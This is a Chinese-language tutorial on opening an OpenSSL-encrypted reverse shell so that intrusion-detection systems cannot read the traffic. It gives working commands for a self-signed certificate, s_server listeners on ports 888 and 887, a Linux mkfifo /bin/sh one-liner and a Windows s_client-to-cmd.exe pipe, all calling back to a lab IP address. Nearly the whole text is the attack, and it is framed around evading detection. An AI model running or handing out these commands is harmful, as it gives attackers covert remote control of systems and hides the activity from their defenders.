一、实际环境:
当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。
OpenSSL 简介:
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份
二、实验过程:
1、首先生成自签名证书,输入的时候默认回车即可:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
2、服务端监听888端口:
openssl s_server -quiet -key key.pem -cert cert.pem -port 888
①Linux下使用mkfifo进行反弹shell:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.136.144:888 > /tmp/s; rm /tmp/s
成功反弹shell:
②Windows下反弹shell:
1、服务端要开启两个监听,因为以上命令会从 ip:port1 获取命令发送给 cmd.exe执行,然后把结果返回到 ip:port2,因此在本机需要启动两个 s_server
openssl s_server -quiet -key key.pem -cert cert.pem -port 888
openssl s_server -quiet -key key.pem -cert cert.pem -port 887
2、Windows下执行命令:
openssl s_client -quiet -connect 192.168.136.144:888 | cmd.exe | openssl s_client -quiet -connect 192.168.136.144:887
在服务端的888的窗口发送命令:
然后服务端887的窗口就能收到执行结果:
PS:经过测试,发送完命令后,等待好久都没结果回来,但是在windows上敲一下空格或者回车等操作,结果不一会就回来了